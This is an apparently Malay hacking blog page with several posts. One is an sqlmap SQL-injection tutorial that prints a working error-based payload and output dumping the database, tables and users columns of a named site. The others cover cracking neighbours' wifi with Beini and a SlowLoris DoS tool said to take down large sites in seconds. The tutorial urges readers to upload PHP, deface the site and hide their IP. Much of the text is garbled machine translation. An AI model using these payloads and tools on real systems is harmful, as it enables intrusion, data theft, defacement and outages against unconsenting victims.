Blog ini tentang tool-tool yang dikumpul oleh saya untuk mengajar anda tentang hack . Tujuan saya adalah untuk anda mengenalpasti cara hacker hack anda punnya web . Jangan salah gunakan blog ini .
today : Thursday, April 03, 2025
| at :
| safemode : ON > / home / facebook / twitter / exit /
Assalamualaikum dan salam sejahtera.Hari ini aku nak share dengan korang satu software untuk melajukan internet korang.Software tu ialah DnsSpeeder. Seperti namanya, mesti la fugsi dia untuk melajukan kan? Fungsi DnsSpeeder ni adalah untuk melajukan internet dengan mempercepatkan atau menghilangkan delay antara client komputer dengan DNS server. Features DnsSpeeder : 1. Menentukan DNS tercepat 2. Memilih DNS tercepat yang dipakai secara automatik 3. Browsing menjadi lebih cepat 4. Ringan 5. Cara penggunaan yang simple dan mudah 6 Support Windows XP / Windows 7 32 dan 64 bit Download di sini : Official Website : http://www.sharewarestudio.com/dnsspeeder/dnsspeeder.zip Mirror Mediafire : http://www.mediafire.com/?65o58wwy64hp1oo
Cara nak guna software ni senang saja. 1. Selepas dah download, extract. 2. Kemudia buka dnspeeder.exe. 3.Tak perlu install terus run. 4. Kemudian kalau korang nak tambah DNS tengok di kotak "DNS Server". 5. Kemudian tambah la dns koran seperti google dns. 6. Siap.enjoy.dia akan jalan secara automatik. Bagi yang tak faham boleh rujuk video di bawah : Video :
Sqlmap adalah salah satu sql suntikan alat automasi yang paling popular dan berkuasa di luar sana. Memandangkan http terdedah permintaan url, sqlmap boleh mengeksploitasi pangkalan data jauh dan melakukan banyak hacking seperti mengeluarkan nama pangkalan data, jadual, columns semua data dalam jadual dan lain-lain dapat membaca dan menulis fail pada sistem fail jauh di bawah tertentu keadaan. Ditulis dalam python ia adalah salah satu alat yang paling berkuasa hacking di luar sana. Sqlmap adalah Metasploit suntikan sql.
Sqlmap dimasukkan ke dalam pen ujian linux distro seperti kali linux, backbox, dan lain-lain Pada backbox lain distro ia hanya boleh dimuat turun dari url berikut
Dalam tutorial ini kita akan mempelajari bagaimana untuk menggunakan sqlmap mengeksploitasi aplikasi web yang terdedah dan melihat apa yang semua boleh dilakukan dengan apa-apa alat.
Untuk memahami tutorial ini, anda perlu mempunyai pengetahuan yang menyeluruh mengenai bagaimana pangkalan data web yang didorong oleh permohonan kerja. Sebagai contoh yang dibuat dengan php + mysql.
Vulnerable Urls
Katakanlah terdapat satu aplikasi web atau laman web yang mempunyai url di dalamnya seperti ini
http://www.site.com/section.php?id=51
dan ia terdedah kepada suntikan sql kerana pemaju laman web yang tidak betul-betul melarikan diri id parameter. Ini hanya boleh diuji dengan mencuba untuk membuka url
http://www.site.com/section.php?id=51 '
Kami hanya menambah petikan tunggal dalam parameter. Jika url ini melemparkan kesilapan atau bertindak balas dengan cara yang tidak dijangka maka ia adalah jelas bahawa pangkalan data telah mendapat quote yang tidak dijangka satu permohonan itu tidak terlepas dengan betul. Jadi dalam kes ini ini parameter input "id" adalah terdedah kepada suntikan sql.
Hacking dengan SQLMAP
Sekarang masa untuk bergerak ke sqlmap untuk menggodam url tersebut. Arahan sqlmap dikendalikan dari terminal dengan jurubahasa python itu.
Di atas adalah pertama dan yang paling mudah arahan untuk menjalankan dengan alat sqlmap. Ia memeriksa parameter input untuk mencari jika mereka terdedah kepada suntikan sql atau tidak. Untuk sqlmap ini menghantar pelbagai jenis muatan suntikan sql untuk parameter input dan memeriksa output. Dalam sqlmap proses ini juga dapat mengenal pasti sistem os jauh, nama pangkalan data dan versi. Di sini ialah bagaimana output mungkin kelihatan seperti
[*] starting at 12:10:33 [12:10:33] [INFO] resuming back-end DBMS 'mysql' [12:10:34] [INFO] testing connection to the target url sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: id Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: id=51 AND (SELECT 1489 FROM(SELECT COUNT(*),CONCAT(0x3a73776c3a,(SELECT (CASE WHEN (1489=1489) THEN 1 ELSE 0 END)),0x3a7a76653a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) --- [12:10:37] [INFO] the back-end DBMS is MySQL web server operating system: FreeBSD web application technology: Apache 2.2.22 back-end DBMS: MySQL 5
Jadi alat sqlmap telah menemui sistem operasi, pelayan web dan pangkalan data bersama-sama dengan maklumat versi. Malah ini banyak yang agak menarik. Tetapi masa untuk bergerak dan melihat apa yang lebih adalah alat ini mampu.
Cari Pangkalan Data
Setelah sqlmap mengesahkan bahawa url jauh terdedah kepada suntikan sql dan exploitable langkah seterusnya adalah untuk mengetahui nama-nama pangkalan data yang wujud pada sistem jauh. The "- DBS" pilihan digunakan untuk mendapatkan senarai pangkalan data.
[*] starting at 12:12:56 [12:12:56] [INFO] resuming back-end DBMS 'mysql' [12:12:57] [INFO] testing connection to the target url sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: id Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: id=51 AND (SELECT 1489 FROM(SELECT COUNT(*),CONCAT(0x3a73776c3a,(SELECT (CASE WHEN (1489=1489) THEN 1 ELSE 0 END)),0x3a7a76653a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) --- [12:13:00] [INFO] the back-end DBMS is MySQL web server operating system: FreeBSD web application technology: Apache 2.2.22 back-end DBMS: MySQL 5 [12:13:00] [INFO] fetching database names [12:13:00] [INFO] the SQL query used returns 2 entries [12:13:00] [INFO] resumed: information_schema [12:13:00] [INFO] resumed: safecosmetics available databases [2]: [*] information_schema [*] safecosmetics
Hasilnya menunjukkan pangkalan data yang sedia ada di dalam remote system .
Cari jadual dalam pangkalan data tertentu
Sekarang masa untuk mengetahui apa yang wujud dalam jadual pangkalan data tertentu. Katakanlah pangkalan data kepentingan di sini adalah 'safecosmetics'
dan hasilnya boleh menjadi sesuatu yang serupa dengan ini
[11:55:18] [INFO] the back-end DBMS is MySQL web server operating system: FreeBSD web application technology: Apache 2.2.22 back-end DBMS: MySQL 5 [11:55:18] [INFO] fetching tables for database: 'safecosmetics' [11:55:19] [INFO] heuristics detected web page charset 'ascii' [11:55:19] [INFO] the SQL query used returns 216 entries [11:55:20] [INFO] retrieved: acl_acl [11:55:21] [INFO] retrieved: acl_acl_sections
........... more tables
Mari kita mendapatkan ruangan jadual tertentu sekarang.
Dapatkan columns sesebuah tables
Sekarang kita mempunyai senarai jadual dengan kami, ia akan menjadi satu idea yang baik untuk mendapatkan ruang beberapa jadual penting. Katakanlah jadual adalah 'pengguna' dan ia mengandungi nama pengguna dan kata laluan.
[12:17:39] [INFO] the back-end DBMS is MySQL web server operating system: FreeBSD web application technology: Apache 2.2.22 back-end DBMS: MySQL 5 [12:17:39] [INFO] fetching columns for table 'users' in database 'safecosmetics' [12:17:41] [INFO] heuristics detected web page charset 'ascii' [12:17:41] [INFO] the SQL query used returns 8 entries [12:17:42] [INFO] retrieved: id [12:17:43] [INFO] retrieved: int(11) [12:17:45] [INFO] retrieved: name [12:17:46] [INFO] retrieved: text [12:17:47] [INFO] retrieved: password
[12:17:48] [INFO] retrieved: text ....... [12:17:59] [INFO] retrieved: hash [12:18:01] [INFO] retrieved: varchar(128) Database: safecosmetics Table: users [8 columns] +-------------------+--------------+ | Column | Type | +-------------------+--------------+ | email | text | | hash | varchar(128) | | id | int(11) | | name | text | | password | text | | permission | tinyint(4) | | system_allow_only | text | | system_home | text | +-------------------+--------------+
Sekarang hanya perlu masuk ke ADMINPAGE . Korang boleh try search kat google findadminpage , sorry [BH] tak ada tool findadminpage . Then , korang upload la php korang , deface and anything la .
Disclaimer
Admin tak bertanggungjawab jika anda tertangkap melakukan aktiviti dia atas . Hehe , pandai buat pandai cover la . Admin cadangkan korang guna tool Lindungi IP Anda Dengan Superhide IP.
Bagi yang tidak paham anda boleh lihat video di bawah .
Assalammualaikum dan Selamat Sejahtera . Hari ini [BH] hendak ajar cara Crack Wifi Orang Lain Dengan Menggunakan Beini . Tool ini telah dicuba oleh [BH] dan ianya berkesan untuk WEP sahaja . Untuk crack yang WPA/PSK kita perlukan table password .
*The time to used is depends on the internet flow,the higher the usage,the faster you get the password* For dictionary download:WPA/WPA2 cracking dictionary
Assalammualaikum dan Selamat Sejahtera . Hari ini [BH] hendak mengajar Cara Hantar SMS Hanya Untuk Warga Malaysia Secara Percuma . Korang yang suka hantar SMS ini mesti cepat habis kredit kan ? Nah ni ada website yang Support SMS percuma untuk hantar SMS.
Assalammualaikum dan Selamat Sejahtera . Hari ini [BH] hendak kongsi DDOS tool [BH] yang berguna dan lain daripada lain . Tool ini sangat bagus kerana fungsi - fungsi tertentu yang terdapat dalam tool ini . Tool ini dipanggil BamBam Dos Tool .
Update Status: 2012/12/23
1) BamBam adalah pada ia versi Beta. Maklum balas yang lebih anda berikan kepada kami lebih banyak anda membantu kita memahami isu-isu itu.
2) Bagi orang yang mengatakan BamBam tidak bekerja untuk mereka. BamBam menggunakan kaedah SlowLoris untuk mengambil turun laman web. SlowLoris menggunakan kaedah tertentu serangan dan ia kebanyakannya dibuat untuk Apache Server. Tetapi ingat. Tidak setiap pelayan adalah terdedah kepada jenis serangan.
3) Kami bekerja pada versi baru perisian. Di bawah ini kita akan menyenaraikan beberapa ciri-ciri yang kita merancang untuk melaksanakan pada Versi 1, di BamBam.
Pengesanan Auto Server sasaran
Auto CMS pengesanan sasaran
Penggunaan Sasaran dari AnonOperations.com Operasi Aktif
Auto memeriksa jika laman web ini adalah Hidup dalam masa yang diberikan
Lebih Jenis Serangan
Auto Serangan Jenis Cadangan berdasarkan pelayan jauh jenis / teknologi dan lain-lain
Perisian Terbaru Auto
Begginer / berpengalaman Mod Pengguna
Berikut adalah skrin utama program ini, dengan beberapa konfigurasi asas. Anda menetapkan sasaran (termasuk http:// atau https:// juga), bilangan Kelawar (benang) dan bilangan batu per Bat (paket / thread). Anda mempunyai had 999 Kelawar dan 999 batu per Bat, tetapi biasanya 50 Kelawar dan 500 batu yang cukup untuk menurunkan laman web yang besar dalam SECONDS! Dalam versi kemudian kami akan menambah beberapa tambahan kaedah DoS dan automatik cek isup-suka, untuk membolehkan anda menyemak kejayaan anda automaticly! Tunggu untuk versi seterusnya dan bersenang-senang dengan itu!